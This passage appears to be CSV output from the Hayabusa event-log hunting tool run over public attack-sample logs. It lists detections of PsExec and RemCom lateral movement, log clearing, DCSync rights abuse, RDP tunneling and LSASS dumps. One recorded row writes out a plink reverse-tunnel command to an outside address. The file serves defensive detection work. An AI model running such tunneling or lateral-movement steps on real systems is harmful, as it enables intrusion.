PowerShell,,rules/sigma/powershell/powershell_script/powershell_accessing_win_api.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 04:15:23.660 +09:00,SEC511,4104,high,Accessing WinAPI in PowerShell,,rules/sigma/powershell/powershell_script/powershell_accessing_win_api.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx +2017-08-31 04:25:48.647 +09:00,SEC511,4104,high,Malicious Nishang PowerShell 
Commandlets,,rules/sigma/powershell/powershell_script/powershell_nishang_malicious_commandlets.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-string-menu.evtx +2019-01-19 22:00:10.350 +09:00,IEWIN7,5145,informational,Network Share File Access,User: IEUser : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: blabla.exe : IP Address: 10.0.2.16,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_renamed_psexecsvc_5145.evtx +2019-01-19 22:00:10.350 +09:00,IEWIN7,5145,informational,Network Share File Access,User: IEUser : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: blabla.exe : IP Address: 10.0.2.16,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_renamed_psexecsvc_5145.evtx +2019-01-19 22:00:10.540 +09:00,IEWIN7,5145,high,First Time Seen Remote Named Pipe,,rules/sigma/builtin/security/win_lm_namedpipe.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_renamed_psexecsvc_5145.evtx +2019-01-19 22:00:10.711 +09:00,IEWIN7,5145,high,Suspicious PsExec Execution,,rules/sigma/builtin/security/win_susp_psexec.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_renamed_psexecsvc_5145.evtx +2019-01-19 22:00:10.711 +09:00,IEWIN7,5145,high,Suspicious PsExec Execution,,rules/sigma/builtin/security/win_susp_psexec.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_renamed_psexecsvc_5145.evtx +2019-01-19 22:00:10.711 +09:00,IEWIN7,5145,high,Suspicious PsExec Execution,,rules/sigma/builtin/security/win_susp_psexec.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_renamed_psexecsvc_5145.evtx +2019-01-19 22:00:10.711 +09:00,IEWIN7,5145,high,First Time Seen Remote Named Pipe,,rules/sigma/builtin/security/win_lm_namedpipe.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral 
Movement/LM_renamed_psexecsvc_5145.evtx +2019-01-19 22:00:10.711 +09:00,IEWIN7,5145,high,First Time Seen Remote Named Pipe,,rules/sigma/builtin/security/win_lm_namedpipe.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_renamed_psexecsvc_5145.evtx +2019-01-19 22:00:10.711 +09:00,IEWIN7,5145,high,First Time Seen Remote Named Pipe,,rules/sigma/builtin/security/win_lm_namedpipe.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_renamed_psexecsvc_5145.evtx +2019-01-20 16:00:50.800 +09:00,WIN-77LTAPHIQ1R.example.corp,1102,high,Security log was cleared,User: Administrator,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_bloodhound.evtx +2019-01-20 16:29:57.863 +09:00,WIN-77LTAPHIQ1R.example.corp,1102,high,Security log was cleared,User: Administrator,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_psloggedon.evtx +2019-02-02 18:16:52.479 +09:00,ICORP-DC.internal.corp,4776,informational,NTLM Logon to Local Account,User: helpdesk : Workstation evil.internal.corp : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privexchange_dirkjan.evtx +2019-02-02 18:17:22.562 +09:00,ICORP-DC.internal.corp,4776,informational,NTLM Logon to Local Account,User: EXCHANGE$ : Workstation EXCHANGE : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privexchange_dirkjan.evtx +2019-02-02 18:17:22.563 +09:00,ICORP-DC.internal.corp,4624,informational,Logon Type 3 - Network,User: EXCHANGE$ : Workstation: EXCHANGE : IP Address: 192.168.111.87 : Port: 58128 : LogonID: 
0x24daa6,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privexchange_dirkjan.evtx +2019-02-02 18:17:27.629 +09:00,ICORP-DC.internal.corp,5136,critical,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privexchange_dirkjan.evtx +2019-02-02 18:17:27.629 +09:00,ICORP-DC.internal.corp,5136,critical,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privexchange_dirkjan.evtx +2019-02-14 00:15:04.175 +09:00,PC02.example.corp,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunneling_4624.evtx +2019-02-14 00:15:08.689 +09:00,PC02.example.corp,4624,low,Logon Type 5 - Service,User: sshd_server : Workstation: PC02 : IP Address: - : Port: - : LogonID: 0xe509,rules/hayabusa/default/events/Security/Logons/4624_LogonType-5-Service.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunneling_4624.evtx +2019-02-14 00:19:51.259 +09:00,PC02.example.corp,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: PC02 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x21f73 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunneling_4624.evtx +2019-02-14 00:26:53.356 +09:00,PC02.example.corp,4624,informational,Logon Type 10 - RDP (Remote Interactive),User: IEUser : Workstation: PC02 : IP Address: 127.0.0.1 : Port: 49164 : LogonID: 0x45120 : (Warning: Credentials are stored in 
memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-10-RemoteInteractive.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunneling_4624.evtx +2019-02-14 00:26:53.356 +09:00,PC02.example.corp,4624,high,RDP Login from Localhost,,rules/sigma/builtin/security/win_rdp_localhost_login.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunneling_4624.evtx +2019-02-14 00:29:40.657 +09:00,PC02.example.corp,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: PC02 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x4a26d : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunneling_4624.evtx +2019-02-14 00:31:19.529 +09:00,PC02.example.corp,4624,informational,Logon Type 3 - Network,User: ANONYMOUS LOGON : Workstation: PC01 : IP Address: 10.0.2.17 : Port: 49168 : LogonID: 0x73d02,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunneling_4624.evtx +2019-02-14 00:31:31.556 +09:00,PC02.example.corp,4624,informational,Logon Type 3 - Network,User: ANONYMOUS LOGON : Workstation: PC01 : IP Address: 10.0.2.17 : Port: 49169 : LogonID: 0x7d4f4,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunneling_4624.evtx +2019-02-14 03:01:41.593 +09:00,PC01.example.corp,1102,high,Security log was cleared,User: admin01,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx +2019-02-14 03:02:04.426 +09:00,PC01.example.corp,4624,informational,Logon Type 11 - CachedInteractive,User: user01 : Workstation: PC01 : IP Address: 127.0.0.1 : Port: 0 
: LogonID: 0x1414c8 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-11-CachedInteractive.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx +2019-02-14 03:02:04.426 +09:00,PC01.example.corp,4648,informational,Explicit Logon,Source User: PC01$ : Target User: user01 : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx +2019-02-14 03:02:04.526 +09:00,PC01.example.corp,4648,informational,Explicit Logon,Source User: PC01$ : Target User: user01 : IP Address: - : Process: C:\Windows\System32\lsass.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx +2019-02-14 03:02:04.526 +09:00,PC01.example.corp,4624,informational,Logon Type 7 - Unlock,User: user01 : Workstation: PC01 : IP Address: - : Port: - : LogonID: 0x1414d9,rules/hayabusa/default/events/Security/Logons/4624_LogonType-7-Unlock.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx +2019-02-14 03:04:01.632 +09:00,PC01.example.corp,5156,high,RDP over Reverse SSH Tunnel WFP,,rules/sigma/builtin/security/win_rdp_reverse_tunnel.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx +2019-02-14 03:04:01.632 +09:00,PC01.example.corp,5156,high,RDP over Reverse SSH Tunnel WFP,,rules/sigma/builtin/security/win_rdp_reverse_tunnel.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx +2019-02-14 03:04:43.171 +09:00,PC01.example.corp,4672,informational,Admin Logon,User: admin01 : LogonID: 
0x14871d,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx +2019-02-14 03:04:45.905 +09:00,PC01.example.corp,5156,high,RDP over Reverse SSH Tunnel WFP,,rules/sigma/builtin/security/win_rdp_reverse_tunnel.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx +2019-02-14 03:04:45.905 +09:00,PC01.example.corp,5156,high,RDP over Reverse SSH Tunnel WFP,,rules/sigma/builtin/security/win_rdp_reverse_tunnel.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx +2019-02-14 03:04:57.442 +09:00,PC01.example.corp,4672,informational,Admin Logon,User: admin01 : LogonID: 0x148f5d,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx +2019-02-14 03:04:58.363 +09:00,PC01.example.corp,4624,informational,Logon Type 10 - RDP (Remote Interactive),User: admin01 : Workstation: PC01 : IP Address: 127.0.0.1 : Port: 49274 : LogonID: 0x14a321 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-10-RemoteInteractive.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx +2019-02-14 03:04:58.363 +09:00,PC01.example.corp,4648,informational,Explicit Logon,Source User: PC01$ : Target User: admin01 : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx +2019-02-14 03:04:58.363 +09:00,PC01.example.corp,4624,high,RDP Login from Localhost,,rules/sigma/builtin/security/win_rdp_localhost_login.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx +2019-02-14 03:04:58.363 
+09:00,PC01.example.corp,4624,low,Admin User Remote Logon,,rules/sigma/builtin/security/win_admin_rdp_login.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx +2019-02-14 03:04:58.363 +09:00,PC01.example.corp,4672,informational,Admin Logon,User: admin01 : LogonID: 0x14a321,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx +2019-02-16 19:02:21.934 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: plink.exe 10.0.2.18 -P 80 -C -R 127.0.0.3:4444:127.0.0.2:3389 -l test -pw test : Path: C:\Users\IEUser\Desktop\plink.exe : User: PC01\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 19:02:21.934 +09:00,PC01.example.corp,1,high,Suspicious Plink Remote Forwarding,,rules/sigma/process_creation/sysmon_susp_plink_remote_forward.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 19:02:21.934 +09:00,PC01.example.corp,1,medium,Exfiltration and Tunneling Tools Execution,,rules/sigma/process_creation/win_exfiltration_and_tunneling_tools_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 19:02:48.502 +09:00,PC01.example.corp,3,high,Suspicious Outbound RDP Connections,,rules/sigma/network_connection/sysmon_susp_rdp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 19:03:48.058 +09:00,PC01.example.corp,1,informational,Process Creation,Command: UI0Detect.exe 224 : Path: C:\Windows\System32\UI0Detect.exe : User: PC01\IEUser : Parent Command: C:\Windows\system32\UI0Detect.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and 
Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 19:04:04.141 +09:00,PC01.example.corp,1,informational,Process Creation,Command: \SystemRoot\System32\smss.exe 00000000 0000003c : Path: C:\Windows\System32\smss.exe : User: NT AUTHORITY\SYSTEM : Parent Command: \SystemRoot\System32\smss.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 19:04:04.151 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: %%SystemRoot%%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,12288,512 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=winsrv:ConServerDllInitialization,2 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16 : Path: C:\Windows\System32\csrss.exe : User: NT AUTHORITY\SYSTEM : Parent Command: \SystemRoot\System32\smss.exe 00000000 0000003c ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 19:04:04.221 +09:00,PC01.example.corp,1,informational,Process Creation,Command: winlogon.exe : Path: C:\Windows\System32\winlogon.exe : User: NT AUTHORITY\SYSTEM : Parent Command: \SystemRoot\System32\smss.exe 00000000 0000003c ,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 19:04:04.351 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""LogonUI.exe"" /flags:0x0 : Path: C:\Windows\System32\LogonUI.exe : User: NT AUTHORITY\SYSTEM : Parent Command: winlogon.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 19:04:04.892 +09:00,PC01.example.corp,1,informational,Process Creation,Command: \SystemRoot\System32\smss.exe 00000000 0000003c : Path: 
C:\Windows\System32\smss.exe : User: NT AUTHORITY\SYSTEM : Parent Command: \SystemRoot\System32\smss.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 19:04:04.892 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: %%SystemRoot%%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,12288,512 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=winsrv:ConServerDllInitialization,2 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16 : Path: C:\Windows\System32\csrss.exe : User: NT AUTHORITY\SYSTEM : Parent Command: \SystemRoot\System32\smss.exe 00000000 0000003c ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 19:04:04.962 +09:00,PC01.example.corp,1,informational,Process Creation,Command: winlogon.exe : Path: C:\Windows\System32\winlogon.exe : User: NT AUTHORITY\SYSTEM : Parent Command: \SystemRoot\System32\smss.exe 00000000 0000003c ,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 19:04:05.092 +09:00,PC01.example.corp,3,high,Suspicious Outbound RDP Connections,,rules/sigma/network_connection/sysmon_susp_rdp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 19:04:05.283 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""LogonUI.exe"" /flags:0x0 : Path: C:\Windows\System32\LogonUI.exe : User: NT AUTHORITY\SYSTEM : Parent Command: winlogon.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 19:04:05.563 +09:00,PC01.example.corp,1,informational,Process Creation,Command: 
C:\Windows\system32\TSTheme.exe -Embedding : Path: C:\Windows\System32\TSTheme.exe : User: PC01\IEUser : Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 19:05:26.499 +09:00,PC01.example.corp,1,informational,Process Creation,Command: atbroker.exe : Path: C:\Windows\System32\AtBroker.exe : User: PC01\IEUser : Parent Command: winlogon.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 19:06:38.843 +09:00,PC01.example.corp,1,informational,Process Creation,Command: taskhost.exe $(Arg0) : Path: C:\Windows\System32\taskhost.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-17 02:54:26.956 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: IEUser : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: System32\RemComSvc.exe : IP Address: 10.0.2.16,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx +2019-02-17 02:54:26.956 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: IEUser : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: System32\RemComSvc.exe : IP Address: 10.0.2.16,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx +2019-02-17 02:55:47.181 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: IEUser : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: System32\RemComSvc.exe : IP Address: 
10.0.2.16,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx +2019-02-17 02:55:47.181 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: IEUser : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: System32\RemComSvc.exe : IP Address: 10.0.2.16,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx +2019-02-17 02:57:41.475 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: IEUser : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: System32\RemComSvc.exe : IP Address: 10.0.2.16,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx +2019-02-17 02:57:41.475 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: IEUser : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: System32\RemComSvc.exe : IP Address: 10.0.2.16,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx +2019-02-17 03:19:18.442 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: IEUser : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\System32\RemComSvc.exe : IP Address: ::1,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx +2019-02-17 03:19:18.442 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: IEUser : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\System32\RemComSvc.exe : IP Address: 
::1,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx +2019-02-17 03:19:18.442 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: IEUser : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\System32\RemComSvc.exe : IP Address: ::1,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx +2019-02-17 03:19:18.442 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: IEUser : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\System32\RemComSvc.exe : IP Address: ::1,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx +2019-02-17 03:19:18.442 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: IEUser : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\System32 : IP Address: ::1,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx +2019-02-17 03:19:18.442 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: IEUser : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\System32 : IP Address: ::1,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx +2019-02-17 03:19:18.442 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: IEUser : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\System32 : IP Address: ::1,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral 
Movement/LM_REMCOM_5145_TargetHost.evtx +2019-02-17 03:19:18.442 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: IEUser : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\System32 : IP Address: ::1,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx +2019-02-17 03:19:18.442 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: IEUser : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows : IP Address: ::1,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx +2019-02-17 03:19:18.442 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: IEUser : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows : IP Address: ::1,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx +2019-02-17 03:19:18.442 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: IEUser : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows : IP Address: ::1,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx +2019-02-17 03:19:18.442 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: IEUser : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows : IP Address: ::1,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx +2019-02-17 03:19:18.442 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: IEUser : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\System32\RemComSvc.exe 
: IP Address: ::1,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx +2019-02-17 03:19:18.522 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: IEUser : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\System32\RemComSvc.exe : IP Address: ::1,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx +2019-03-18 04:09:41.328 +09:00,PC04.example.corp,11,high,LSASS Memory Dump File Creation,,rules/sigma/file_event/sysmon_lsass_memory_dump_file_creation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_lsass_memdump.evtx +2019-03-18 04:09:41.328 +09:00,PC04.example.corp,10,high,LSASS Memory 